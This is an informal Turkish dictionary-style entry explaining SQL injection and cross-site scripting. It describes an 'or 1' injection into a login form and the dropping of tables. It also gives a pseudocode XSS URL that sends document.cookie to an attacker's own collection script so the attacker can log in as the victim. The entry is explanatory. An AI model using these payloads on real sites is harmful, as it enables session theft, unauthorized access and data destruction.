kişinin formların kullandığı sql querylerin nasıl çalıştığını anlayıp olası bir input denetimsizliğine karşı forma sql query parçaçıkları eklemeleri olayına bilgisayar jargonunda verilen ad.sql poisoning olarak da anılır.diyelimki username soruluyor bize formda username'in yanına "or 1" girersek ve formda bu denetlenmiyorsa user ulaşamayacağı bilgilere ulaşabilir.user'ın bu yolla table adını alıp table 'i drop table'la silmesi ve kendine admin username'i ve şifresi de yaratması mümkündür ciddi sistemlerde buna karşı önlem alınmalıdır.
Cross Site Scripting:
genellikle url'deki parametreler gibi dinamik data'yi kullanarak kullanicinin bilgilerini aciga cikarma dverilen olayına verilen addır biraz açarsak
ornegin sozluk'teki show.asp* verilen parametrelerden bi tanesini ["uu" diyelim] sayfanin icine basligin yanina koysaydi, ben (pseudocode yazicam ama) show.asp?t=hede&uu=page.go("http://sitem/cookiekaydet.php?data="+document.cookie) yazip sifreyi alabilirdim. (url oyle verilince basligin hemen yanina page.go(...) yaziliyo, bunu goren browser execute ediyo, edince de sozluk username ve sifrenizin bulundugu cookie'yi url'ye ekliyo. cookiekaydet.php de url'den eklenen kukiyi alip benim diske kaydediyo mesela, ben de sizin cookie'yi kullanarak adiniza girebiliyorum.) butun olay asil url'yi (show.asp?t=hede&uu=...) size yutturmama bagli...